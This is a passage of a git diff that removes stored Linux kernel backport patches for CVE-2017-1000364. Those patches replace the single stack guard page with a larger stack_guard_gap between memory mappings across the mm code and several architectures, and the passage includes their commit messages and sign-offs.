arch_get_unmapped_area(struct file *filp, unsigned long addr, - /* At this point: (!vmm || addr < vmm->vm_end). 
*/ - if (TASK_SIZE - len < addr) - return -ENOMEM; -- if (!vmm || addr + len <= vmm->vm_start) -+ if (!vmm || addr + len <= vm_start_gap(vmm)) - return addr; - addr = vmm->vm_end; - if (flags & MAP_SHARED) -diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c -index 1e2872b..148c4e9 100644 ---- a/fs/hugetlbfs/inode.c -+++ b/fs/hugetlbfs/inode.c -@@ -171,7 +171,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr, - addr = ALIGN(addr, huge_page_size(h)); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c -index af33fb7..aea2d0b 100644 ---- a/fs/proc/task_mmu.c -+++ b/fs/proc/task_mmu.c -@@ -284,11 +284,7 @@ show_map_vma(struct seq_file *m, struct vm_area_struct *vma, int is_pid) - - /* We don't show the stack guard page in /proc/maps */ - start = vma->vm_start; -- if (stack_guard_page_start(vma, start)) -- start += PAGE_SIZE; - end = vma->vm_end; -- if (stack_guard_page_end(vma, end)) -- end -= PAGE_SIZE; - - seq_setwidth(m, 25 + sizeof(void *) * 6 - 1); - seq_printf(m, "%08lx-%08lx %c%c%c%c %08llx %02x:%02x %lu ", -diff --git a/include/linux/mm.h b/include/linux/mm.h -index db853de..54ad2e4 100644 ---- a/include/linux/mm.h -+++ b/include/linux/mm.h -@@ -1242,34 +1242,6 @@ int set_page_dirty_lock(struct page *page); - int clear_page_dirty_for_io(struct page *page); - int get_cmdline(struct task_struct *task, char *buffer, int buflen); - --/* Is the vma a continuation of the stack vma above it? 
*/ --static inline int vma_growsdown(struct vm_area_struct *vma, unsigned long addr) --{ -- return vma && (vma->vm_end == addr) && (vma->vm_flags & VM_GROWSDOWN); --} -- --static inline int stack_guard_page_start(struct vm_area_struct *vma, -- unsigned long addr) --{ -- return (vma->vm_flags & VM_GROWSDOWN) && -- (vma->vm_start == addr) && -- !vma_growsdown(vma->vm_prev, addr); --} -- --/* Is the vma a continuation of the stack vma below it? */ --static inline int vma_growsup(struct vm_area_struct *vma, unsigned long addr) --{ -- return vma && (vma->vm_start == addr) && (vma->vm_flags & VM_GROWSUP); --} -- --static inline int stack_guard_page_end(struct vm_area_struct *vma, -- unsigned long addr) --{ -- return (vma->vm_flags & VM_GROWSUP) && -- (vma->vm_end == addr) && -- !vma_growsup(vma->vm_next, addr); --} -- - extern struct task_struct *task_of_stack(struct task_struct *task, - struct vm_area_struct *vma, bool in_group); - -@@ -1930,6 +1902,7 @@ void page_cache_async_readahead(struct address_space *mapping, - - unsigned long max_sane_readahead(unsigned long nr); - -+extern unsigned long stack_guard_gap; - /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */ - extern int expand_stack(struct vm_area_struct *vma, unsigned long address); - -@@ -1958,6 +1931,30 @@ static inline struct vm_area_struct * find_vma_intersection(struct mm_struct * m - return vma; - } - -+static inline unsigned long vm_start_gap(struct vm_area_struct *vma) -+{ -+ unsigned long vm_start = vma->vm_start; -+ -+ if (vma->vm_flags & VM_GROWSDOWN) { -+ vm_start -= stack_guard_gap; -+ if (vm_start > vma->vm_start) -+ vm_start = 0; -+ } -+ return vm_start; -+} -+ -+static inline unsigned long vm_end_gap(struct vm_area_struct *vma) -+{ -+ unsigned long vm_end = vma->vm_end; -+ -+ if (vma->vm_flags & VM_GROWSUP) { -+ vm_end += stack_guard_gap; -+ if (vm_end < vma->vm_end) -+ vm_end = -PAGE_SIZE; -+ } -+ return vm_end; -+} -+ - static inline unsigned long vma_pages(struct 
vm_area_struct *vma) - { - return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT; -diff --git a/mm/gup.c b/mm/gup.c -index 3cec4df..ce1630b 100644 ---- a/mm/gup.c -+++ b/mm/gup.c -@@ -275,11 +275,6 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma, - unsigned int fault_flags = 0; - int ret; - -- /* For mlock, just skip the stack guard page. */ -- if ((*flags & FOLL_MLOCK) && -- (stack_guard_page_start(vma, address) || -- stack_guard_page_end(vma, address + PAGE_SIZE))) -- return -ENOENT; - if (*flags & FOLL_WRITE) - fault_flags |= FAULT_FLAG_WRITE; - if (nonblocking) -diff --git a/mm/memory.c b/mm/memory.c -index 6ca26c3..0c4f5e3 100644 ---- a/mm/memory.c -+++ b/mm/memory.c -@@ -2580,40 +2580,6 @@ out_release: - } - - /* -- * This is like a special single-page "expand_{down|up}wards()", -- * except we must first make sure that 'address{-|+}PAGE_SIZE' -- * doesn't hit another vma. -- */ --static inline int check_stack_guard_page(struct vm_area_struct *vma, unsigned long address) --{ -- address &= PAGE_MASK; -- if ((vma->vm_flags & VM_GROWSDOWN) && address == vma->vm_start) { -- struct vm_area_struct *prev = vma->vm_prev; -- -- /* -- * Is there a mapping abutting this one below? -- * -- * That's only ok if it's the same stack mapping -- * that has gotten split.. -- */ -- if (prev && prev->vm_end == address) -- return prev->vm_flags & VM_GROWSDOWN ? 0 : -ENOMEM; -- -- return expand_downwards(vma, address - PAGE_SIZE); -- } -- if ((vma->vm_flags & VM_GROWSUP) && address + PAGE_SIZE == vma->vm_end) { -- struct vm_area_struct *next = vma->vm_next; -- -- /* As VM_GROWSDOWN but s/below/above/ */ -- if (next && next->vm_start == address + PAGE_SIZE) -- return next->vm_flags & VM_GROWSUP ? 0 : -ENOMEM; -- -- return expand_upwards(vma, address + PAGE_SIZE); -- } -- return 0; --} -- --/* - * We enter with non-exclusive mmap_sem (to exclude vma changes, - * but allow concurrent faults), and pte mapped but not yet locked. 
- * We return with mmap_sem still held, but pte unmapped and unlocked. -@@ -2633,10 +2599,6 @@ static int do_anonymous_page(struct mm_struct *mm, struct vm_area_struct *vma, - if (vma->vm_flags & VM_SHARED) - return VM_FAULT_SIGBUS; - -- /* Check if we need to add a guard page to the stack */ -- if (check_stack_guard_page(vma, address) < 0) -- return VM_FAULT_SIGSEGV; -- - /* Use the zero-page for reads */ - if (!(flags & FAULT_FLAG_WRITE)) { - entry = pte_mkspecial(pfn_pte(my_zero_pfn(address), -diff --git a/mm/mmap.c b/mm/mmap.c -index f032671..14ccc94 100644 ---- a/mm/mmap.c -+++ b/mm/mmap.c -@@ -290,6 +290,7 @@ SYSCALL_DEFINE1(brk, unsigned long, brk) - unsigned long retval; - unsigned long newbrk, oldbrk; - struct mm_struct *mm = current->mm; -+ struct vm_area_struct *next; - unsigned long min_brk; - bool populate; - -@@ -334,7 +335,8 @@ SYSCALL_DEFINE1(brk, unsigned long, brk) - } - - /* Check against existing mmap mappings. */ -- if (find_vma_intersection(mm, oldbrk, newbrk+PAGE_SIZE)) -+ next = find_vma(mm, oldbrk); -+ if (next && newbrk + PAGE_SIZE > vm_start_gap(next)) - goto out; - - /* Ok, looks good - let it rip. */ -@@ -357,10 +359,22 @@ out: - - static long vma_compute_subtree_gap(struct vm_area_struct *vma) - { -- unsigned long max, subtree_gap; -- max = vma->vm_start; -- if (vma->vm_prev) -- max -= vma->vm_prev->vm_end; -+ unsigned long max, prev_end, subtree_gap; -+ -+ /* -+ * Note: in the rare case of a VM_GROWSDOWN above a VM_GROWSUP, we -+ * allow two stack_guard_gaps between them here, and when choosing -+ * an unmapped area; whereas when expanding we only require one. -+ * That's a little inconsistent, but keeps the code here simpler. 
-+ */ -+ max = vm_start_gap(vma); -+ if (vma->vm_prev) { -+ prev_end = vm_end_gap(vma->vm_prev); -+ if (max > prev_end) -+ max -= prev_end; -+ else -+ max = 0; -+ } - if (vma->vm_rb.rb_left) { - subtree_gap = rb_entry(vma->vm_rb.rb_left, - struct vm_area_struct, vm_rb)->rb_subtree_gap; -@@ -453,7 +467,7 @@ static void validate_mm(struct mm_struct *mm) - anon_vma_unlock_read(anon_vma); - } - -- highest_address = vma->vm_end; -+ highest_address = vm_end_gap(vma); - vma = vma->vm_next; - i++; - } -@@ -622,7 +636,7 @@ void __vma_link_rb(struct mm_struct *mm, struct vm_area_struct *vma, - if (vma->vm_next) - vma_gap_update(vma->vm_next); - else -- mm->highest_vm_end = vma->vm_end; -+ mm->highest_vm_end = vm_end_gap(vma); - - /* - * vma->vm_prev wasn't known when we followed the rbtree to find the -@@ -874,7 +888,7 @@ again: remove_next = 1 + (end > next->vm_end); - vma_gap_update(vma); - if (end_changed) { - if (!next) -- mm->highest_vm_end = end; -+ mm->highest_vm_end = vm_end_gap(vma); - else if (!adjust_next) - vma_gap_update(next); - } -@@ -917,7 +931,7 @@ again: remove_next = 1 + (end > next->vm_end); - else if (next) - vma_gap_update(next); - else -- mm->highest_vm_end = end; -+ VM_WARN_ON(mm->highest_vm_end != vm_end_gap(vma)); - } - if (insert && file) - uprobe_mmap(insert); -@@ -1740,7 +1754,7 @@ unsigned long unmapped_area(struct vm_unmapped_area_info *info) - - while (true) { - /* Visit left subtree if it looks promising */ -- gap_end = vma->vm_start; -+ gap_end = vm_start_gap(vma); - if (gap_end >= low_limit && vma->vm_rb.rb_left) { - struct vm_area_struct *left = - rb_entry(vma->vm_rb.rb_left, -@@ -1751,7 +1765,7 @@ unsigned long unmapped_area(struct vm_unmapped_area_info *info) - } - } - -- gap_start = vma->vm_prev ? vma->vm_prev->vm_end : 0; -+ gap_start = vma->vm_prev ? 
vm_end_gap(vma->vm_prev) : 0; - check_current: - /* Check if current node has a suitable gap */ - if (gap_start > high_limit) -@@ -1778,8 +1792,8 @@ check_current: - vma = rb_entry(rb_parent(prev), - struct vm_area_struct, vm_rb); - if (prev == vma->vm_rb.rb_left) { -- gap_start = vma->vm_prev->vm_end; -- gap_end = vma->vm_start; -+ gap_start = vm_end_gap(vma->vm_prev); -+ gap_end = vm_start_gap(vma); - goto check_current; - } - } -@@ -1843,7 +1857,7 @@ unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info) - - while (true) { - /* Visit right subtree if it looks promising */ -- gap_start = vma->vm_prev ? vma->vm_prev->vm_end : 0; -+ gap_start = vma->vm_prev ? vm_end_gap(vma->vm_prev) : 0; - if (gap_start <= high_limit && vma->vm_rb.rb_right) { - struct vm_area_struct *right = - rb_entry(vma->vm_rb.rb_right, -@@ -1856,7 +1870,7 @@ unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info) - - check_current: - /* Check if current node has a suitable gap */ -- gap_end = vma->vm_start; -+ gap_end = vm_start_gap(vma); - if (gap_end < low_limit) - return -ENOMEM; - if (gap_start <= high_limit && gap_end - gap_start >= length) -@@ -1882,7 +1896,7 @@ check_current: - struct vm_area_struct, vm_rb); - if (prev == vma->vm_rb.rb_right) { - gap_start = vma->vm_prev ? 
-- vma->vm_prev->vm_end : 0; -+ vm_end_gap(vma->vm_prev) : 0; - goto check_current; - } - } -@@ -1920,7 +1934,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr, - unsigned long len, unsigned long pgoff, unsigned long flags) - { - struct mm_struct *mm = current->mm; -- struct vm_area_struct *vma; -+ struct vm_area_struct *vma, *prev; - struct vm_unmapped_area_info info; - - if (len > TASK_SIZE - mmap_min_addr) -@@ -1931,9 +1945,10 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr, - - if (addr) { - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && addr >= mmap_min_addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - return addr; - } - -@@ -1956,7 +1971,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - const unsigned long len, const unsigned long pgoff, - const unsigned long flags) - { -- struct vm_area_struct *vma; -+ struct vm_area_struct *vma, *prev; - struct mm_struct *mm = current->mm; - unsigned long addr = addr0; - struct vm_unmapped_area_info info; -@@ -1971,9 +1986,10 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0, - /* requesting a specific address */ - if (addr) { - addr = PAGE_ALIGN(addr); -- vma = find_vma(mm, addr); -+ vma = find_vma_prev(mm, addr, &prev); - if (TASK_SIZE - len >= addr && addr >= mmap_min_addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma)) && -+ (!prev || addr >= vm_end_gap(prev))) - return addr; - } - -@@ -2099,21 +2115,19 @@ find_vma_prev(struct mm_struct *mm, unsigned long addr, - * update accounting. This is shared with both the - * grow-up and grow-down cases. 
- */ --static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, unsigned long grow) -+static int acct_stack_growth(struct vm_area_struct *vma, -+ unsigned long size, unsigned long grow) - { - struct mm_struct *mm = vma->vm_mm; - struct rlimit *rlim = current->signal->rlim; -- unsigned long new_start, actual_size; -+ unsigned long new_start; - - /* address space limit tests */ - if (!may_expand_vm(mm, grow)) - return -ENOMEM; - - /* Stack limit test */ -- actual_size = size; -- if (size && (vma->vm_flags & (VM_GROWSUP | VM_GROWSDOWN))) -- actual_size -= PAGE_SIZE; -- if (actual_size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur)) -+ if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur)) - return -ENOMEM; - - /* mlock limit tests */ -@@ -2154,17 +2168,30 @@ static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, uns - */ - int expand_upwards(struct vm_area_struct *vma, unsigned long address) - { -+ struct vm_area_struct *next; -+ unsigned long gap_addr; - int error = 0; - - if (!(vma->vm_flags & VM_GROWSUP)) - return -EFAULT; - - /* Guard against wrapping around to address 0. */ -- if (address < PAGE_ALIGN(address+4)) -- address = PAGE_ALIGN(address+4); -- else -+ address &= PAGE_MASK; -+ address += PAGE_SIZE; -+ if (!address) - return -ENOMEM; - -+ /* Enforce stack_guard_gap */ -+ gap_addr = address + stack_guard_gap; -+ if (gap_addr < address) -+ return -ENOMEM; -+ next = vma->vm_next; -+ if (next && next->vm_start < gap_addr) { -+ if (!(next->vm_flags & VM_GROWSUP)) -+ return -ENOMEM; -+ /* Check that both stack segments have the same anon_vma? */ -+ } -+ - /* We must make sure the anon_vma is allocated. 
*/ - if (unlikely(anon_vma_prepare(vma))) - return -ENOMEM; -@@ -2205,7 +2232,7 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address) - if (vma->vm_next) - vma_gap_update(vma->vm_next); - else -- vma->vm_mm->highest_vm_end = address; -+ vma->vm_mm->highest_vm_end = vm_end_gap(vma); - spin_unlock(&vma->vm_mm->page_table_lock); - - perf_event_mmap(vma); -@@ -2225,6 +2252,8 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address) - int expand_downwards(struct vm_area_struct *vma, - unsigned long address) - { -+ struct vm_area_struct *prev; -+ unsigned long gap_addr; - int error; - - address &= PAGE_MASK; -@@ -2232,6 +2261,17 @@ int expand_downwards(struct vm_area_struct *vma, - if (error) - return error; - -+ /* Enforce stack_guard_gap */ -+ gap_addr = address - stack_guard_gap; -+ if (gap_addr > address) -+ return -ENOMEM; -+ prev = vma->vm_prev; -+ if (prev && prev->vm_end > gap_addr) { -+ if (!(prev->vm_flags & VM_GROWSDOWN)) -+ return -ENOMEM; -+ /* Check that both stack segments have the same anon_vma? */ -+ } -+ - /* We must make sure the anon_vma is allocated. */ - if (unlikely(anon_vma_prepare(vma))) - return -ENOMEM; -@@ -2283,28 +2323,25 @@ int expand_downwards(struct vm_area_struct *vma, - return error; - } - --/* -- * Note how expand_stack() refuses to expand the stack all the way to -- * abut the next virtual mapping, *unless* that mapping itself is also -- * a stack mapping. We want to leave room for a guard page, after all -- * (the guard page itself is not added here, that is done by the -- * actual page faulting logic) -- * -- * This matches the behavior of the guard page logic (see mm/memory.c: -- * check_stack_guard_page()), which only allows the guard page to be -- * removed under these circumstances. -- */ -+/* enforced gap between the expanding stack and other mappings. 
*/ -+unsigned long stack_guard_gap = 256UL< -Debugged-by: Linus Torvalds -Signed-off-by: Hugh Dickins -Acked-by: Michal Hocko -Signed-off-by: Linus Torvalds -Signed-off-by: Greg Kroah-Hartman ---- - mm/mmap.c | 6 ++++-- - 1 file changed, 4 insertions(+), 2 deletions(-) - -diff --git a/mm/mmap.c b/mm/mmap.c -index ff12e23..f975ec9 100644 ---- a/mm/mmap.c -+++ b/mm/mmap.c -@@ -1770,7 +1770,8 @@ check_current: - /* Check if current node has a suitable gap */ - if (gap_start > high_limit) - return -ENOMEM; -- if (gap_end >= low_limit && gap_end - gap_start >= length) -+ if (gap_end >= low_limit && -+ gap_end > gap_start && gap_end - gap_start >= length) - goto found; - - /* Visit right subtree if it looks promising */ -@@ -1873,7 +1874,8 @@ check_current: - gap_end = vm_start_gap(vma); - if (gap_end < low_limit) - return -ENOMEM; -- if (gap_start <= high_limit && gap_end - gap_start >= length) -+ if (gap_start <= high_limit && -+ gap_end > gap_start && gap_end - gap_start >= length) - goto found; - - /* Visit left subtree if it looks promising */ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0001.patch deleted file mode 100644 index 01c19765..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0001.patch +++ /dev/null 
@@ -1,1549 +0,0 @@
-From 640c7dfdc7c723143b1ce42f5569ec8565cbbde7 Mon Sep 17 00:00:00 2001
-From: Hugh Dickins
-Date: Mon, 19 Jun 2017 20:32:47 +0200
-Subject: mm: larger stack guard gap, between vmas
-
-commit 1be7107fbe18eed3e319a6c3e83c78254b693acb upstream.
-
-Stack guard page is a useful feature to reduce a risk of stack smashing
-into a different mapping. We have been using a single page gap which
-is sufficient to prevent having stack adjacent to a different mapping.
-But this seems to be insufficient in the light of the stack usage in
-userspace. E.g. glibc uses as large as 64kB alloca() in many commonly
-used functions. Others use constructs liks gid_t buffer[NGROUPS_MAX]
-which is 256kB or stack strings with MAX_ARG_STRLEN.
-
-This will become especially dangerous for suid binaries and the default
-no limit for the stack size limit because those applications can be
-tricked to consume a large portion of the stack and a single glibc call
-could jump over the guard page. These attacks are not theoretical,
-unfortunatelly.
-
-Make those attacks less probable by increasing the stack guard gap
-to 1MB (on systems with 4k pages; but make it depend on the page size
-because systems with larger base pages might cap stack allocations in
-the PAGE_SIZE units) which should cover larger alloca() and VLA stack
-allocations. It is obviously not a full fix because the problem is
-somehow inherent, but it should reduce attack space a lot.
-
-One could argue that the gap size should be configurable from userspace,
-but that can be done later when somebody finds that the new 1MB is wrong
-for some special case applications. For now, add a kernel command line
-option (stack_guard_gap) to specify the stack gap size (in page units).
-
-Implementation wise, first delete all the old code for stack guard page:
-because although we could get away with accounting one extra page in a
-stack vma, accounting a larger gap can break userspace - case in point,
-a program run with "ulimit -S -v 20000" failed when the 1MB gap was
-counted for RLIMIT_AS; similar problems could come with RLIMIT_MLOCK
-and strict non-overcommit mode.
-
-Instead of keeping gap inside the stack vma, maintain the stack guard
-gap as a gap between vmas: using vm_start_gap() in place of vm_start
-(or vm_end_gap() in place of vm_end if VM_GROWSUP) in just those few
-places which need to respect the gap - mainly arch_get_unmapped_area(),
-and and the vma tree's subtree_gap support for that.
-
-Original-patch-by: Oleg Nesterov
-Original-patch-by: Michal Hocko
-Signed-off-by: Hugh Dickins
-Acked-by: Michal Hocko
-Tested-by: Helge Deller # parisc
-Signed-off-by: Linus Torvalds
-[Hugh Dickins: Backported to 3.2]
-[bwh: Fix more instances of vma->vm_start in sparc64 impl. of
- arch_get_unmapped_area_topdown() and generic impl.
of
- hugetlb_get_unmapped_area()]
-Signed-off-by: Ben Hutchings
----
- Documentation/kernel-parameters.txt | 7 ++
- arch/alpha/kernel/osf_sys.c | 2 +-
- arch/arm/mm/mmap.c | 12 +--
- arch/frv/mm/elf-fdpic.c | 6 +-
- arch/ia64/kernel/sys_ia64.c | 18 +++-
- arch/ia64/mm/hugetlbpage.c | 4 +-
- arch/mips/mm/mmap.c | 19 ++--
- arch/parisc/kernel/sys_parisc.c | 40 ++++++---
- arch/powerpc/mm/slice.c | 24 ++---
- arch/sh/mm/mmap.c | 29 +++---
- arch/sparc/kernel/sys_sparc_32.c | 2 +-
- arch/sparc/kernel/sys_sparc_64.c | 30 ++++---
- arch/sparc/mm/hugetlbpage.c | 27 +++---
- arch/tile/mm/hugetlbpage.c | 26 +++---
- arch/x86/kernel/sys_x86_64.c | 29 +++---
- arch/x86/mm/hugetlbpage.c | 24 ++---
- fs/hugetlbfs/inode.c | 4 +-
- fs/proc/task_mmu.c | 4 -
- include/linux/mm.h | 53 ++++++-----
- mm/memory.c | 49 ----------
- mm/mmap.c | 175 ++++++++++++++++++++----------------
- 21 files changed, 312 insertions(+), 272 deletions(-)
-
-diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt
-index ac601c4..356bf4b 100644
---- a/Documentation/kernel-parameters.txt
-+++ b/Documentation/kernel-parameters.txt
-@@ -2457,6 +2457,13 @@ bytes respectively. Such letter suffixes can also be entirely omitted.
- spia_pedr=
- spia_peddr=
-
-+ stack_guard_gap= [MM]
-+ override the default stack gap protection. The value
-+ is in page units and it defines how many pages prior
-+ to (for stacks growing down) resp. after (for stacks
-+ growing up) the main stack are reserved for no other
-+ mapping. Default value is 256 pages.
-+
- stacktrace [FTRACE]
- Enabled the stack tracer on boot up.
-
-diff --git a/arch/alpha/kernel/osf_sys.c b/arch/alpha/kernel/osf_sys.c
-index 01e8715..b9abe5b 100644
---- a/arch/alpha/kernel/osf_sys.c
-+++ b/arch/alpha/kernel/osf_sys.c
-@@ -1147,7 +1147,7 @@ arch_get_unmapped_area_1(unsigned long addr, unsigned long len,
- /* At this point: (!vma || addr < vma->vm_end).
*/
- if (limit - len < addr)
- return -ENOMEM;
-- if (!vma || addr + len <= vma->vm_start)
-+ if (!vma || addr + len <= vm_start_gap(vma))
- return addr;
- addr = vma->vm_end;
- vma = vma->vm_next;
-diff --git a/arch/arm/mm/mmap.c b/arch/arm/mm/mmap.c
-index 44b628e..4497b5e 100644
---- a/arch/arm/mm/mmap.c
-+++ b/arch/arm/mm/mmap.c
-@@ -30,7 +30,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- {
- struct mm_struct *mm = current->mm;
- struct vm_area_struct *vma;
-- unsigned long start_addr;
-+ unsigned long start_addr, vm_start;
- int do_align = 0;
- int aliasing = cache_is_vipt_aliasing();
-
-@@ -62,7 +62,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
-
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
- if (len > mm->cached_hole_size) {
-@@ -96,15 +96,17 @@ full_search:
- }
- return -ENOMEM;
- }
-- if (!vma || addr + len <= vma->vm_start) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (!vma || addr + len <= vm_start) {
- /*
- * Remember the place where we stopped the search:
- */
- mm->free_area_cache = addr + len;
- return addr;
- }
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
- addr = vma->vm_end;
- if (do_align)
- addr = COLOUR_ALIGN(addr, pgoff);
-diff --git a/arch/frv/mm/elf-fdpic.c b/arch/frv/mm/elf-fdpic.c
-index 385fd30..96eca58 100644
---- a/arch/frv/mm/elf-fdpic.c
-+++ b/arch/frv/mm/elf-fdpic.c
-@@ -74,7 +74,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- addr = PAGE_ALIGN(addr);
- vma = find_vma(current->mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- goto success;
- }
-
-@@ -89,7 +89,7 @@ unsigned long
arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- for (; vma; vma = vma->vm_next) {
- if (addr > limit)
- break;
-- if (addr + len <= vma->vm_start)
-+ if (addr + len <= vm_start_gap(vma))
- goto success;
- addr = vma->vm_end;
- }
-@@ -104,7 +104,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- for (; vma; vma = vma->vm_next) {
- if (addr > limit)
- break;
-- if (addr + len <= vma->vm_start)
-+ if (addr + len <= vm_start_gap(vma))
- goto success;
- addr = vma->vm_end;
- }
-diff --git a/arch/ia64/kernel/sys_ia64.c b/arch/ia64/kernel/sys_ia64.c
-index 609d500..77c0aff 100644
---- a/arch/ia64/kernel/sys_ia64.c
-+++ b/arch/ia64/kernel/sys_ia64.c
-@@ -27,7 +27,8 @@ arch_get_unmapped_area (struct file *filp, unsigned long addr, unsigned long len
- long map_shared = (flags & MAP_SHARED);
- unsigned long start_addr, align_mask = PAGE_SIZE - 1;
- struct mm_struct *mm = current->mm;
-- struct vm_area_struct *vma;
-+ struct vm_area_struct *vma, *prev;
-+ unsigned long prev_end;
-
- if (len > RGN_MAP_LIMIT)
- return -ENOMEM;
-@@ -58,7 +59,17 @@ arch_get_unmapped_area (struct file *filp, unsigned long addr, unsigned long len
- full_search:
- start_addr = addr = (addr + align_mask) & ~align_mask;
-
-- for (vma = find_vma(mm, addr); ; vma = vma->vm_next) {
-+ for (vma = find_vma_prev(mm, addr, &prev); ; prev = vma,
-+ vma = vma->vm_next) {
-+ if (prev) {
-+ prev_end = vm_end_gap(prev);
-+ if (addr < prev_end) {
-+ addr = (prev_end + align_mask) & ~align_mask;
-+ /* If vma already violates gap, forget it */
-+ if (vma && addr > vma->vm_start)
-+ addr = vma->vm_start;
-+ }
-+ }
- /* At this point: (!vma || addr < vma->vm_end).
*/
- if (TASK_SIZE - len < addr || RGN_MAP_LIMIT - len < REGION_OFFSET(addr)) {
- if (start_addr != TASK_UNMAPPED_BASE) {
-@@ -68,12 +79,11 @@ arch_get_unmapped_area (struct file *filp, unsigned long addr, unsigned long len
- }
- return -ENOMEM;
- }
-- if (!vma || addr + len <= vma->vm_start) {
-+ if (!vma || addr + len <= vm_start_gap(vma)) {
- /* Remember the address where we stopped this search: */
- mm->free_area_cache = addr + len;
- return addr;
- }
-- addr = (vma->vm_end + align_mask) & ~align_mask;
- }
- }
-
-diff --git a/arch/ia64/mm/hugetlbpage.c b/arch/ia64/mm/hugetlbpage.c
-index 5ca674b..66a1ec0 100644
---- a/arch/ia64/mm/hugetlbpage.c
-+++ b/arch/ia64/mm/hugetlbpage.c
-@@ -171,9 +171,9 @@ unsigned long hugetlb_get_unmapped_area(struct file *file, unsigned long addr, u
- /* At this point: (!vmm || addr < vmm->vm_end). */
- if (REGION_OFFSET(addr) + len > RGN_MAP_LIMIT)
- return -ENOMEM;
-- if (!vmm || (addr + len) <= vmm->vm_start)
-+ if (!vmm || (addr + len) <= vm_start_gap(vmm))
- return addr;
-- addr = ALIGN(vmm->vm_end, HPAGE_SIZE);
-+ addr = ALIGN(vm_end_gap(vmm), HPAGE_SIZE);
- }
- }
-
-diff --git a/arch/mips/mm/mmap.c b/arch/mips/mm/mmap.c
-index 302d779..a79ddcf 100644
---- a/arch/mips/mm/mmap.c
-+++ b/arch/mips/mm/mmap.c
-@@ -70,6 +70,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- struct mm_struct *mm = current->mm;
- struct vm_area_struct *vma;
- unsigned long addr = addr0;
-+ unsigned long vm_start;
- int do_color_align;
-
- if (unlikely(len > TASK_SIZE))
-@@ -103,7 +104,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
-
- vma = find_vma(mm, addr);
- if (TASK_SIZE - len >= addr &&
-- (!vma || addr + len <= vma->vm_start))
-+ (!vma || addr + len <= vm_start_gap(vma)))
- return addr;
- }
-
-@@ -118,7 +119,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- /* At this point: (!vma || addr < vma->vm_end).
*/
- if (TASK_SIZE - len < addr)
- return -ENOMEM;
-- if (!vma || addr + len <= vma->vm_start)
-+ if (!vma || addr + len <= vm_start_gap(vma))
- return addr;
- addr = vma->vm_end;
- if (do_color_align)
-@@ -145,7 +146,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- /* make sure it can fit in the remaining address space */
- if (likely(addr > len)) {
- vma = find_vma(mm, addr - len);
-- if (!vma || addr <= vma->vm_start) {
-+ if (!vma || addr <= vm_start_gap(vma)) {
- /* cache the address as a hint for next time */
- return mm->free_area_cache = addr - len;
- }
-@@ -165,20 +166,22 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- * return with success:
- */
- vma = find_vma(mm, addr);
-- if (likely(!vma || addr + len <= vma->vm_start)) {
-+ if (vma)
-+ vm_start = vm_start_gap(vma);
-+ if (likely(!vma || addr + len <= vm_start)) {
- /* cache the address as a hint for next time */
- return mm->free_area_cache = addr;
- }
-
- /* remember the largest hole we saw so far */
-- if (addr + mm->cached_hole_size < vma->vm_start)
-- mm->cached_hole_size = vma->vm_start - addr;
-+ if (addr + mm->cached_hole_size < vm_start)
-+ mm->cached_hole_size = vm_start - addr;
-
- /* try just below the current vma->vm_start */
-- addr = vma->vm_start - len;
-+ addr = vm_start - len;
- if (do_color_align)
- addr = COLOUR_ALIGN_DOWN(addr, pgoff);
-- } while (likely(len < vma->vm_start));
-+ } while (likely(len < vm_start));
-
- bottomup:
- /*
-diff --git a/arch/parisc/kernel/sys_parisc.c b/arch/parisc/kernel/sys_parisc.c
-index 7ea75d1..1d4ac8d 100644
